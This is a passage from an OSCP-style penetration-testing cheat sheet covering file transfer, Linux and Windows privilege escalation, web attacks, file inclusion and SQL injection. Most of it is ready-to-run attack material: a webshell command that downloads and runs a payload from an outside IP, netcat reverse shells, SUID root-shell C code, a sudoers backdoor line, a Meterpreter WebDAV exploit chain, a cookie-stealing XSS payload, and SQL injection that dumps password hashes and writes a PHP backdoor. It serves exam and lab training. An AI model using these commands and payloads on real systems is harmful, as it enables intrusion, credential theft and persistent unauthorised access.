1167 | echo end with >> webdl.vbs 1168 | timeout 1 1169 | echo 1170 | 1171 | The file can be run using the following syntax: 1172 | 1173 | `C:\temp\cscript.exe webdl.vbs` 1174 | 1175 | - Mounting File Shares 1176 | 1177 | - Mount NFS share to /mnt/nfs 1178 | mount $ip:/vol/share /mnt/nfs 1179 | 1180 | - HTTP Put 1181 | nmap -p80 $ip --script http-put --script-args 1182 | http-put.url='/test/sicpwn.php',http-put.file='/var/www/html/sicpwn.php 1183 | 1184 | - Uploading Files 1185 | ------------------------------------------------------------------------------------------------------------- 1186 | 1187 | - SCP 1188 | 1189 | scp username1@source_host:directory1/filename1 username2@destination_host:directory2/filename2 1190 | 1191 | scp localfile username@$ip:~/Folder/ 1192 | 1193 | scp Linux_Exploit_Suggester.pl bob@192.168.1.10:~ 1194 | 1195 | 1196 | - Webdav with Davtest- Some sysadmins are kind enough to enable the PUT method - This tool will auto upload a backdoor 1197 | 1198 | `davtest -move -sendbd auto -url http://$ip` 1199 | 1200 | https://github.com/cldrn/davtest 1201 | 1202 | You can also upload a file using the PUT method with the curl command: 1203 | 1204 | `curl -T 'leetshellz.txt' 'http://$ip'` 1205 | 1206 | And rename it to an executable file using the MOVE method with the curl command: 1207 | 1208 | `curl -X MOVE --header 'Destination:http://$ip/leetshellz.php' 'http://$ip/leetshellz.txt'` 1209 | 1210 | - Upload shell using limited php shell cmd 1211 | use the webshell to download and execute the meterpreter 1212 | \[curl -s --data "cmd=wget http://174.0.42.42:8000/dhn -O 1213 | /tmp/evil" http://$ip/files/sh.php 1214 | \[curl -s --data "cmd=chmod 777 /tmp/evil" 1215 | http://$ip/files/sh.php 1216 | curl -s --data "cmd=bash -c /tmp/evil" http://$ip/files/sh.php 1217 | 1218 | - TFTP 1219 | mkdir /tftp 1220 | atftpd --daemon --port 69 /tftp 1221 | cp /usr/share/windows-binaries/nc.exe /tftp/ 1222 | EX. FROM WINDOWS HOST: 1223 | C:\\Users\\Offsec>tftp -i $ip get nc.exe 1224 | 1225 | - FTP 1226 | apt-get update && apt-get install pure-ftpd 1227 | 1228 | \#!/bin/bash 1229 | groupadd ftpgroup 1230 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser 1231 | pure-pw useradd offsec -u ftpuser -d /ftphome 1232 | pure-pw mkdb 1233 | cd /etc/pure-ftpd/auth/ 1234 | ln -s ../conf/PureDB 60pdb 1235 | mkdir -p /ftphome 1236 | chown -R ftpuser:ftpgroup /ftphome/ 1237 | 1238 | /etc/init.d/pure-ftpd restart 1239 | 1240 | - Packing Files 1241 | ------------------------------------------------------------------------------------------------------------- 1242 | 1243 | - Ultimate Packer for eXecutables 1244 | upx -9 nc.exe 1245 | 1246 | - exe2bat - Converts EXE to a text file that can be copied and 1247 | pasted 1248 | locate exe2bat 1249 | wine exe2bat.exe nc.exe nc.txt 1250 | 1251 | - Veil - Evasion Framework - 1252 | https://github.com/Veil-Framework/Veil-Evasion 1253 | apt-get -y install git 1254 | git clone https://github.com/Veil-Framework/Veil-Evasion.git 1255 | cd Veil-Evasion/ 1256 | cd setup 1257 | setup.sh -c 1258 | 1259 | Privilege Escalation 1260 | ================================================================================================================== 1261 | 1262 | *Password reuse is your friend. The OSCP labs are true to life, in the way that the users will reuse passwords across different services and even different boxes. Maintain a list of cracked passwords and test them on new machines you encounter.* 1263 | 1264 | 1265 | - Linux Privilege Escalation 1266 | ------------------------------------------------------------------------------------------------------------------------ 1267 | 1268 | - Defacto Linux Privilege Escalation Guide - A much more through guide for linux enumeration: 1269 | [https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) 1270 | 1271 | - Try the obvious - Maybe the user is root or can sudo to root: 1272 | 1273 | `id` 1274 | 1275 | `sudo su` 1276 | 1277 | - Here are the commands I have learned to use to perform linux enumeration and privledge escalation: 1278 | 1279 | What users can login to this box (Do they use thier username as thier password)?: 1280 | 1281 | `grep -vE "nologin|false" /etc/passwd` 1282 | 1283 | What kernel version are we using? Do we have any kernel exploits for this version? 1284 | 1285 | `uname -a` 1286 | 1287 | `searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"` 1288 | 1289 | What applications have active connections?: 1290 | 1291 | `netstat -tulpn` 1292 | 1293 | What services are running as root?: 1294 | 1295 | `ps aux | grep root` 1296 | 1297 | What files run as root / SUID / GUID?: 1298 | 1299 | find / -perm +2000 -user root -type f -print 1300 | find / -perm -1000 -type d 2>/dev/null # Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here. 1301 | find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it. 1302 | find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it. 1303 | find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID 1304 | for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done 1305 | find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null 1306 | 1307 | What folders are world writeable?: 1308 | 1309 | find / -writable -type d 2>/dev/null # world-writeable folders 1310 | find / -perm -222 -type d 2>/dev/null # world-writeable folders 1311 | find / -perm -o w -type d 2>/dev/null # world-writeable folders 1312 | find / -perm -o x -type d 2>/dev/null # world-executable folders 1313 | find / \( -perm -o w -perm -o x \) -type d 2>/dev/null # world-writeable & executable folders 1314 | 1315 | - There are a few scripts that can automate the linux enumeration process: 1316 | 1317 | - Google is my favorite Linux Kernel exploitation search tool. Many of these automated checkers are missing important kernel exploits which can create a very frustrating blindspot during your OSCP course. 1318 | 1319 | - LinuxPrivChecker.py - My favorite automated linux priv enumeration checker - 1320 | 1321 | [https://www.securitysift.com/download/linuxprivchecker.py](https://www.securitysift.com/download/linuxprivchecker.py) 1322 | 1323 | - LinEnum - (Recently Updated) 1324 | 1325 | [https://github.com/rebootuser/LinEnum](https://github.com/rebootuser/LinEnum) 1326 | 1327 | - linux-exploit-suggester (Recently Updated) 1328 | 1329 | [https://github.com/mzet-/linux-exploit-suggester](https://github.com/mzet-/linux-exploit-suggester) 1330 | 1331 | - Highon.coffee Linux Local Enum - Great enumeration script! 1332 | 1333 | `wget https://highon.coffee/downloads/linux-local-enum.sh` 1334 | 1335 | - Linux Privilege Exploit Suggester (Old has not been updated in years) 1336 | 1337 | [https://github.com/PenturaLabs/Linux\_Exploit\_Suggester](https://github.com/PenturaLabs/Linux_Exploit_Suggester) 1338 | 1339 | - Linux post exploitation enumeration and exploit checking tools 1340 | 1341 | [https://github.com/reider-roque/linpostexp](https://github.com/reider-roque/linpostexp) 1342 | 1343 | 1344 | Handy Kernel Exploits 1345 | 1346 | - CVE-2010-2959 - 'CAN BCM' Privilege Escalation - Linux Kernel < 2.6.36-rc1 (Ubuntu 10.04 / 2.6.32) 1347 | 1348 | [https://www.exploit-db.com/exploits/14814/](https://www.exploit-db.com/exploits/14814/) 1349 | 1350 | wget -O i-can-haz-modharden.c http://www.exploit-db.com/download/14814 1351 | $ gcc i-can-haz-modharden.c -o i-can-haz-modharden 1352 | $ ./i-can-haz-modharden 1353 | [+] launching root shell! 1354 | # id 1355 | uid=0(root) gid=0(root) 1356 | 1357 | - CVE-2010-3904 - Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 1358 | [https://www.exploit-db.com/exploits/15285/](https://www.exploit-db.com/exploits/15285/) 1359 | 1360 | - CVE-2012-0056 - Mempodipper - Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) 1361 | [https://git.zx2c4.com/CVE-2012-0056/about/](https://git.zx2c4.com/CVE-2012-0056/about/) 1362 | Linux CVE 2012-0056 1363 | 1364 | wget -O exploit.c http://www.exploit-db.com/download/18411 1365 | gcc -o mempodipper exploit.c 1366 | ./mempodipper 1367 | 1368 | - CVE-2016-5195 - Dirty Cow - Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 1369 | [https://dirtycow.ninja/](https://dirtycow.ninja/) 1370 | First existed on 2.6.22 (released in 2007) and was fixed on Oct 18, 2016 1371 | 1372 | - Run a command as a user other than root 1373 | 1374 | sudo -u haxzor /usr/bin/vim /etc/apache2/sites-available/000-default.conf 1375 | 1376 | - Add a user or change a password 1377 | 1378 | /usr/sbin/useradd -p 'openssl passwd -1 thePassword' haxzor 1379 | echo thePassword | passwd haxzor --stdin 1380 | 1381 | - Local Privilege Escalation Exploit in Linux 1382 | 1383 | - **SUID** (**S**et owner **U**ser **ID** up on execution) 1384 | Often SUID C binary files are required to spawn a shell as a 1385 | superuser, you can update the UID / GID and shell as required. 1386 | 1387 | below are some quick copy and paste examples for various 1388 | shells: 1389 | 1390 | SUID C Shell for /bin/bash 1391 | 1392 | int main(void){ 1393 | setresuid(0, 0, 0); 1394 | system("/bin/bash"); 1395 | } 1396 | 1397 | SUID C Shell for /bin/sh 1398 | 1399 | int main(void){ 1400 | setresuid(0, 0, 0); 1401 | system("/bin/sh"); 1402 | } 1403 | 1404 | Building the SUID Shell binary 1405 | gcc -o suid suid.c 1406 | For 32 bit: 1407 | gcc -m32 -o suid suid.c 1408 | 1409 | - Create and compile an SUID from a limited shell (no file transfer) 1410 | 1411 | echo "int main(void){\nsetgid(0);\nsetuid(0);\nsystem(\"/bin/sh\");\n}" >privsc.c 1412 | gcc privsc.c -o privsc 1413 | 1414 | - Handy command if you can get a root user to run it. Add the www-data user to Root SUDO group with no password requirement: 1415 | 1416 | `echo 'chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD:ALL" >> /etc/sudoers && chmod 440 /etc/sudoers' > /tmp/update` 1417 | 1418 | - You may find a command is being executed by the root user, you may be able to modify the system PATH environment variable 1419 | to execute your command instead. In the example below, ssh is replaced with a reverse shell SUID connecting to 10.10.10.1 on 1420 | port 4444. 1421 | 1422 | set PATH="/tmp:/usr/local/bin:/usr/bin:/bin" 1423 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.1 4444 >/tmp/f" >> /tmp/ssh 1424 | chmod +x ssh 1425 | 1426 | - SearchSploit 1427 | 1428 | searchsploit –uncsearchsploit apache 2.2 1429 | searchsploit "Linux Kernel" 1430 | searchsploit linux 2.6 | grep -i ubuntu | grep local 1431 | searchsploit slmail 1432 | 1433 | - Kernel Exploit Suggestions for Kernel Version 3.0.0 1434 | 1435 | `./usr/share/linux-exploit-suggester/Linux_Exploit_Suggester.pl -k 3.0.0` 1436 | 1437 | - Precompiled Linux Kernel Exploits - ***Super handy if GCC is not installed on the target machine!*** 1438 | 1439 | [*https://www.kernel-exploits.com/*](https://www.kernel-exploits.com/) 1440 | 1441 | - Collect root password 1442 | 1443 | `cat /etc/shadow |grep root` 1444 | 1445 | - Find and display the proof.txt or flag.txt - LOOT! 1446 | 1447 | cat `find / -name proof.txt -print` 1448 | 1449 | - Windows Privilege Escalation 1450 | -------------------------------------------------------------------------------------------------------------------------- 1451 | 1452 | - Windows Privilege Escalation resource 1453 | http://www.fuzzysecurity.com/tutorials/16.html 1454 | 1455 | - Metasploit Meterpreter Privilege Escalation Guide 1456 | https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/ 1457 | 1458 | - Try the obvious - Maybe the user is SYSTEM or is already part of the Administrator group: 1459 | 1460 | `whoami` 1461 | 1462 | `net user "%username%"` 1463 | 1464 | - Try the getsystem command using meterpreter - rarely works but is worth a try. 1465 | 1466 | `meterpreter > getsystem` 1467 | 1468 | - No File Upload Required Windows Privlege Escalation Basic Information Gathering (based on the fuzzy security tutorial and windows_privesc_check.py). 1469 | 1470 | Copy and paste the following contents into your remote Windows shell in Kali to generate a quick report: 1471 | 1472 | @echo --------- BASIC WINDOWS RECON --------- > report.txt 1473 | timeout 1 1474 | net config Workstation >> report.txt 1475 | timeout 1 1476 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt 1477 | timeout 1 1478 | hostname >> report.txt 1479 | timeout 1 1480 | net users >> report.txt 1481 | timeout 1 1482 | ipconfig /all >> report.txt 1483 | timeout 1 1484 | route print >> report.txt 1485 | timeout 1 1486 | arp -A >> report.txt 1487 | timeout 1 1488 | netstat -ano >> report.txt 1489 | timeout 1 1490 | netsh firewall show state >> report.txt 1491 | timeout 1 1492 | netsh firewall show config >> report.txt 1493 | timeout 1 1494 | schtasks /query /fo LIST /v >> report.txt 1495 | timeout 1 1496 | tasklist /SVC >> report.txt 1497 | timeout 1 1498 | net start >> report.txt 1499 | timeout 1 1500 | DRIVERQUERY >> report.txt 1501 | timeout 1 1502 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt 1503 | timeout 1 1504 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt 1505 | timeout 1 1506 | dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt 1507 | timeout 1 1508 | findstr /si password *.xml *.ini *.txt >> report.txt 1509 | timeout 1 1510 | reg query HKLM /f password /t REG_SZ /s >> report.txt 1511 | timeout 1 1512 | reg query HKCU /f password /t REG_SZ /s >> report.txt 1513 | timeout 1 1514 | dir "C:\" 1515 | timeout 1 1516 | dir "C:\Program Files\" >> report.txt 1517 | timeout 1 1518 | dir "C:\Program Files (x86)\" 1519 | timeout 1 1520 | dir "C:\Users\" 1521 | timeout 1 1522 | dir "C:\Users\Public\" 1523 | timeout 1 1524 | echo REPORT COMPLETE! 1525 | 1526 | 1527 | - Windows Server 2003 and IIS 6.0 WEBDAV Exploiting 1528 | http://www.r00tsec.com/2011/09/exploiting-microsoft-iis-version-60.html 1529 | 1530 | msfvenom -p windows/meterpreter/reverse_tcp LHOST=1.2.3.4 LPORT=443 -f asp > aspshell.txt 1531 | 1532 | cadavar http://$ip 1533 | dav:/> put aspshell.txt 1534 | Uploading aspshell.txt to `/aspshell.txt': 1535 | Progress: [=============================>] 100.0% of 38468 bytes succeeded. 1536 | dav:/> copy aspshell.txt aspshell3.asp;.txt 1537 | Copying `/aspshell3.txt' to `/aspshell3.asp%3b.txt': succeeded. 1538 | dav:/> exit 1539 | 1540 | msf > use exploit/multi/handler 1541 | msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 1542 | msf exploit(handler) > set LHOST 1.2.3.4 1543 | msf exploit(handler) > set LPORT 80 1544 | msf exploit(handler) > set ExitOnSession false 1545 | msf exploit(handler) > exploit -j 1546 | 1547 | curl http://$ip/aspshell3.asp;.txt 1548 | 1549 | [*] Started reverse TCP handler on 1.2.3.4:443 1550 | [*] Starting the payload handler... 1551 | [*] Sending stage (957487 bytes) to 1.2.3.5 1552 | [*] Meterpreter session 1 opened (1.2.3.4:443 -> 1.2.3.5:1063) at 2017-09-25 13:10:55 -0700 1553 | 1554 | - Windows privledge escalation exploits are often written in Python. So, it is necessary to compile the using pyinstaller.py into an executable and upload them to the remote server. 1555 | 1556 | pip install pyinstaller 1557 | wget -O exploit.py http://www.exploit-db.com/download/31853 1558 | python pyinstaller.py --onefile exploit.py 1559 | 1560 | - Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: 1561 | 1562 | https://www.exploit-db.com/exploits/6705/ 1563 | 1564 | https://github.com/Re4son/Churrasco 1565 | 1566 | c:\Inetpub>churrasco 1567 | churrasco 1568 | /churrasco/-->Usage: Churrasco.exe [-d] "command to run" 1569 | 1570 | c:\Inetpub>churrasco -d "net user /add " 1571 | c:\Inetpub>churrasco -d "net localgroup administrators /add" 1572 | c:\Inetpub>churrasco -d "NET LOCALGROUP "Remote Desktop Users" /ADD" 1573 | 1574 | - Windows MS11-080 - http://www.exploit-db.com/exploits/18176/ 1575 | 1576 | python pyinstaller.py --onefile ms11-080.py 1577 | mx11-080.exe -O XP 1578 | 1579 | - Powershell Exploits - You may find that some Windows privledge escalation exploits are written in Powershell. You may not have an interactive shell that allows you to enter the powershell prompt. Once the powershell script is uploaded to the server, here is a quick one liner to run a powershell command from a basic (cmd.exe) shell: 1580 | 1581 | MS16-032 https://www.exploit-db.com/exploits/39719/ 1582 | 1583 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\Public\Invoke-MS16-032.ps1; Invoke-MS16-032 }"` 1584 | 1585 | 1586 | - Powershell Priv Escalation Tools 1587 | https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc 1588 | 1589 | - Windows Run As - Switching users in linux is trival with the `SU` command. However, an equivalent command does not exist in Windows. Here are 3 ways to run a command as a different user in Windows. 1590 | 1591 | - Sysinternals psexec is a handy tool for running a command on a remote or local server as a specific user, given you have thier username and password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Psexec (on a 64 bit system). 1592 | 1593 | C:\>psexec64 \\COMPUTERNAME -u Test -p test -h "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" 1594 | 1595 | PsExec v2.2 - Execute processes remotely 1596 | Copyright (C) 2001-2016 Mark Russinovich 1597 | Sysinternals - www.sysinternals.com 1598 | 1599 | - Runas.exe is a handy windows tool that allows you to run a program as another user so long as you know thier password. The following example creates a reverse shell from a windows server to our Kali box using netcat for Windows and Runas.exe: 1600 | 1601 | C:\>C:\Windows\System32\runas.exe /env /noprofile /user:Test "c:\users\public\nc.exe -nc 192.168.1.10 4444 -e cmd.exe" 1602 | Enter the password for Test: 1603 | Attempting to start nc.exe as user "COMPUTERNAME\Test" ... 1604 | 1605 | - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password. 1606 | 1607 | $username = '' 1608 | $password = '' 1609 | $securePassword = ConvertTo-SecureString $password -AsPlainText -Force 1610 | $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword 1611 | Start-Process -FilePath C:\Users\Public\nc.exe -NoNewWindow -Credential $credential -ArgumentList ("-nc","192.168.1.10","4444","-e","cmd.exe") -WorkingDirectory C:\Users\Public 1612 | 1613 | Next run this script using powershell.exe: 1614 | 1615 | `powershell -ExecutionPolicy ByPass -command "& { . C:\Users\public\PowerShellRunAs.ps1; }"` 1616 | 1617 | 1618 | - Windows Service Configuration Viewer - Check for misconfigurations 1619 | in services that can lead to privilege escalation. You can replace 1620 | the executable with your own and have windows execute whatever code 1621 | you want as the privileged user. 1622 | icacls scsiaccess.exe 1623 | 1624 | scsiaccess.exe 1625 | NT AUTHORITY\SYSTEM:(I)(F) 1626 | BUILTIN\Administrators:(I)(F) 1627 | BUILTIN\Users:(I)(RX) 1628 | APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) 1629 | Everyone:(I)(F) 1630 | 1631 | - Compile a custom add user command in windows using C 1632 | 1633 | ``` 1634 | root@kali:~# cat useradd.c 1635 | #include /* system, NULL, EXIT_FAILURE */ 1636 | int main () 1637 | { 1638 | int i; 1639 | i=system ("net localgroup administrators low /add"); 1640 | return 0; 1641 | } 1642 | ``` 1643 | 1644 | `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c` 1645 | 1646 | - Group Policy Preferences (GPP) 1647 | A common useful misconfiguration found in modern domain environments 1648 | is unprotected Windows GPP settings files 1649 | 1650 | - map the Domain controller SYSVOL share 1651 | 1652 | `net use z:\\dc01\SYSVOL` 1653 | 1654 | - Find the GPP file: Groups.xml 1655 | 1656 | `dir /s Groups.xml` 1657 | 1658 | - Review the contents for passwords 1659 | 1660 | `type Groups.xml` 1661 | 1662 | - Decrypt using GPP Decrypt 1663 | 1664 | `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB` 1665 | 1666 | - Find and display the proof.txt or flag.txt - get the loot! 1667 | 1668 | `#meterpreter > run post/windows/gather/win_privs` 1669 | `cd\ & dir /b /s proof.txt` 1670 | `type c:\pathto\proof.txt` 1671 | 1672 | 1673 | Client, Web and Password Attacks 1674 | ============================================================================================================================== 1675 | 1676 | - Client Attacks 1677 | ------------------------------------------------------------------------------------------------------------ 1678 | 1679 | - MS12-037- Internet Explorer 8 Fixed Col Span ID 1680 | wget -O exploit.html 1681 | 1682 | service apache2 start 1683 | 1684 | - JAVA Signed Jar client side attack 1685 | echo '' > 1688 | /var/www/html/java.html 1689 | User must hit run on the popup that occurs. 1690 | 1691 | - Linux Client Shells 1692 | [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/) 1693 | 1694 | - Setting up the Client Side Exploit 1695 | 1696 | - Swapping Out the Shellcode 1697 | 1698 | - Injecting a Backdoor Shell into Plink.exe 1699 | backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip 1700 | -P 4444 -s reverse\_shell\_tcp 1701 | 1702 | - Web Attacks 1703 | --------------------------------------------------------------------------------------------------------- 1704 | 1705 | - Web Shag Web Application Vulnerability Assessment Platform 1706 | webshag-gui 1707 | 1708 | - Web Shells 1709 | [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells) 1710 | `ls -l /usr/share/webshells/` 1711 | 1712 | - Generate a PHP backdoor (generate) protected with the given 1713 | password (s3cr3t) 1714 | weevely generate s3cr3t 1715 | weevely http://$ip/weevely.php s3cr3t 1716 | 1717 | - Java Signed Applet Attack 1718 | 1719 | - HTTP / HTTPS Webserver Enumeration 1720 | 1721 | - OWASP Dirbuster 1722 | 1723 | - nikto -h $ip 1724 | 1725 | - Essential Iceweasel Add-ons 1726 | Cookies Manager 1727 | https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ 1728 | Tamper Data 1729 | https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ 1730 | 1731 | - Cross Site Scripting (XSS) 1732 | significant impacts, such as cookie stealing and authentication 1733 | bypass, redirecting the victim’s browser to a malicious HTML 1734 | page, and more 1735 | 1736 | - Browser Redirection and IFRAME Injection 1737 | ```html 1738 | 1739 | ``` 1740 | 1741 | - Stealing Cookies and Session Information 1742 | ```javascript 1743 | 1744 | new image().src="http://$ip/bogus.php?output="+document.cookie; 1745 | 1746 | ``` 1747 | nc -nlvp 80 1748 | 1749 | - File Inclusion Vulnerabilities 1750 | ----------------------------------------------------------------------------------------------------------------------------- 1751 | 1752 | - Local (LFI) and remote (RFI) file inclusion vulnerabilities are 1753 | commonly found in poorly written PHP code. 1754 | 1755 | - fimap - There is a Python tool called fimap which can be 1756 | leveraged to automate the exploitation of LFI/RFI 1757 | vulnerabilities that are found in PHP (sqlmap for LFI): 1758 | [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap) 1759 | 1760 | - Gaining a shell from phpinfo() 1761 | fimap + phpinfo() Exploit - If a phpinfo() file is present, 1762 | it’s usually possible to get a shell, if you don’t know the 1763 | location of the phpinfo file fimap can probe for it, or you 1764 | could use a tool like OWASP DirBuster. 1765 | 1766 | - For Local File Inclusions look for the include() function in PHP 1767 | code. 1768 | ```php 1769 | include("lang/".$_COOKIE['lang']); 1770 | include($_GET['page'].".php"); 1771 | ``` 1772 | 1773 | - LFI - Encode and Decode a file using base64 1774 | ```bash 1775 | curl -s \ 1776 | "http://$ip/?page=php://filter/convert.base64-encode/resource=index" \ 1777 | | grep -e '\[^\\ \]\\{40,\\}' | base64 -d 1778 | ``` 1779 | 1780 | - LFI - Download file with base 64 encoding 1781 | [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank) 1782 | 1783 | - LFI Linux Files: 1784 | /etc/issue 1785 | /proc/version 1786 | /etc/profile 1787 | /etc/passwd 1788 | /etc/passwd 1789 | /etc/shadow 1790 | /root/.bash\_history 1791 | /var/log/dmessage 1792 | /var/mail/root 1793 | /var/spool/cron/crontabs/root 1794 | 1795 | - LFI Windows Files: 1796 | %SYSTEMROOT%\\repair\\system 1797 | %SYSTEMROOT%\\repair\\SAM 1798 | %SYSTEMROOT%\\repair\\SAM 1799 | %WINDIR%\\win.ini 1800 | %SYSTEMDRIVE%\\boot.ini 1801 | %WINDIR%\\Panther\\sysprep.inf 1802 | %WINDIR%\\system32\\config\\AppEvent.Evt 1803 | 1804 | - LFI OSX Files: 1805 | /etc/fstab 1806 | /etc/master.passwd 1807 | /etc/resolv.conf 1808 | /etc/sudoers 1809 | /etc/sysctl.conf 1810 | 1811 | - LFI - Download passwords file 1812 | [*http://$ip/index.php?page=/etc/passwd*](about:blank) 1813 | [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank) 1814 | 1815 | - LFI - Download passwords file with filter evasion 1816 | [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank) 1817 | 1818 | - Local File Inclusion - In versions of PHP below 5.3 we can 1819 | terminate with null byte 1820 | GET 1821 | /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00 1822 | 1823 | - Contaminating Log Files `` 1824 | 1825 | - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini 1826 | file must be configured to allow remote files 1827 | 1828 | */etc/php5/cgi/php.ini* - "allow_url_fopen" and "allow_url_include" both set to "on" 1829 | 1830 | `include($_REQUEST["file"].".php");` 1831 | 1832 | - Remote File Inclusion 1833 | 1834 | `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt ` 1835 | 1836 | `` 1837 | 1838 | - Database Vulnerabilities 1839 | ---------------------------------------------------------------------------------------------------------------------- 1840 | 1841 | - Playing with SQL Syntax 1842 | A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle: 1843 | 1844 | http://sqlfiddle.com 1845 | 1846 | Another site is rextester.com: 1847 | 1848 | http://rextester.com/l/mysql_online_compiler 1849 | 1850 | - Detecting SQL Injection Vulnerabilities. 1851 | 1852 | Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a "blind" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point. 1853 | 1854 | 1855 | - **MSSQL Server SQL Injection Time Delay Detection:** 1856 | Add a 30 second delay to a MSSQL Server Query 1857 | 1858 | - *Original Query* 1859 | 1860 | `SELECT * FROM products WHERE name='Test';` 1861 | 1862 | - *Injection Value* 1863 | 1864 | `'; WAITFOR DELAY '00:00:30'; --` 1865 | 1866 | - *Resulting Query* 1867 | 1868 | `SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --` 1869 | 1870 | - **MySQL Injection Time Delay Detection:** 1871 | Add a 30 second delay to a MySQL Query 1872 | 1873 | - *Original Query* 1874 | 1875 | `SELECT * FROM products WHERE name='Test';` 1876 | 1877 | - *Injection Value* 1878 | 1879 | `'-SLEEP(30); #` 1880 | 1881 | - *Resulting Query* 1882 | 1883 | `SELECT * FROM products WHERE name='Test'-SLEEP(30); #` 1884 | 1885 | 1886 | - **PostGreSQL Injection Time Delay Detection:** 1887 | Add a 30 second delay to an PostGreSQL Query 1888 | 1889 | - *Original Query* 1890 | 1891 | `SELECT * FROM products WHERE name='Test';` 1892 | 1893 | - *Injection Value* 1894 | 1895 | `'; SELECT pg_sleep(30); --` 1896 | 1897 | - *Resulting Query* 1898 | 1899 | `SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --` 1900 | 1901 | - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password 1902 | 1903 | mysql -u root -p -h $ip 1904 | use "Users" 1905 | show tables; 1906 | select \* from users; 1907 | 1908 | - Authentication Bypass 1909 | 1910 | name='wronguser' or 1=1; 1911 | name='wronguser' or 1=1 LIMIT 1; 1912 | 1913 | - Enumerating the Database 1914 | 1915 | `http://192.168.11.35/comment.php?id=738)'` 1916 | 1917 | Verbose error message? 1918 | 1919 | `http://$ip/comment.php?id=738 order by 1` 1920 | 1921 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 ` 1922 | 1923 | Determine MySQL Version: 1924 | 1925 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 ` 1926 | 1927 | Current user being used for the database connection: 1928 | 1929 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 ` 1930 | 1931 | Enumerate database tables and column structures 1932 | 1933 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables ` 1934 | 1935 | Target the users table in the database 1936 | 1937 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' ` 1938 | 1939 | Extract the name and password 1940 | 1941 | `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users ` 1942 | 1943 | Create a backdoor 1944 | 1945 | `http://$ip/comment.php?id=738 union all select 1,2,3,4,"",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'` 1946 | 1947 | 1948 | - **SQLMap Examples** 1949 | 1950 | - Crawl the links 1951 | 1952 | `sqlmap -u http://$ip --crawl=1` 1953 | 1954 | `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3` 1955 | 1956 | 1957 | - SQLMap Search for databases against a suspected GET SQL Injection 1958 | 1959 | `sqlmap –u http://$ip/blog/index.php?search –dbs` 1960 | 1961 | - SQLMap dump tables from database oscommerce at GET SQL injection 1962 | 1963 | `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps ` 1964 | 1965 | - SQLMap GET Parameter command 1966 | 1967 | `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 ` 1968 | 1969 | - SQLMap Post Username parameter 1970 | 1971 | `sqlmap -u 